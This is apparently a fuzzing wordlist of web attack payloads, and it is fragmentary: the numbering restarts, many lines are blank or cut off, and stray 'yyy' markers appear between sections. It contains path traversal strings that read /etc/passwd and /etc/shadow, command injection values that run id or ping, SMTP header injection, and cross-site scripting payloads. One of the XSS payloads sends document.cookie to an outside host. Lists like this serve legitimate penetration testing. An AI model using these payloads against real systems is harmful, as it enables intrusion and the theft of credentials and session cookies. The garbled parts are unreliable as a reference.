yyy
25 | "\t"
26 | #
27 | #'
28 | #'
29 | #xA
30 | #xA#xD
31 | #xD
32 | #xD#xA
33 | $NULL
34 | $null
35 | %
36 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
37 | %00
38 | %00../../../../../../etc/passwd
39 | %00../../../../../../etc/shadow
40 | %00/
41 | %00/etc/passwd%00
42 | %01%02%03%04%0a%0d%0aADSF
43 | %08x
44 | %0A/usr/bin/id
45 | %0A/usr/bin/id%0A
46 | %0Aid
47 | %0Aid%0A
48 | %0a ping -i 30 127.0.0.1 %0a
49 | %oa ping -n 30 127.0.0.1 %0a
50 | %0a id %0a
51 | %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+">
361 |
362 |
363 |
364 |
365 |
366 |
367 |
368 |
370 |
371 |
372 |
373 |
374 |
375 |
376 |
377 |
378 |
379 |
380 |
381 |
yyy
235 | ">
237 | <
238 |
239 | '>
240 | '>
241 | \";alert('XSS');//
242 | %3cscript%3ealert("XSS");%3c/script%3e
243 | %3cscript%3ealert(document.cookie);%3c%2fscript%3e
244 | %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
245 | <script>alert(document.cookie);
246 | <script>alert(document.cookie);<script>alert
247 |
249 |
250 |
252 |
253 |
254 |
255 |
">
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 | '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
270 | ">
271 | %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
272 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{}
273 | '';!--"
cript:alert('XSS')"">
5 |
6 |
7 |
">
8 |
9 | <
10 |
11 | \";alert('XSS');//
12 |
13 |
14 |
26 | click me
27 |
28 |
29 | \x3csVg/\x3e-->
30 | \x3csVg/\x3e
31 |
32 |
%22%3E%3CSvg/onload=confirm`3`//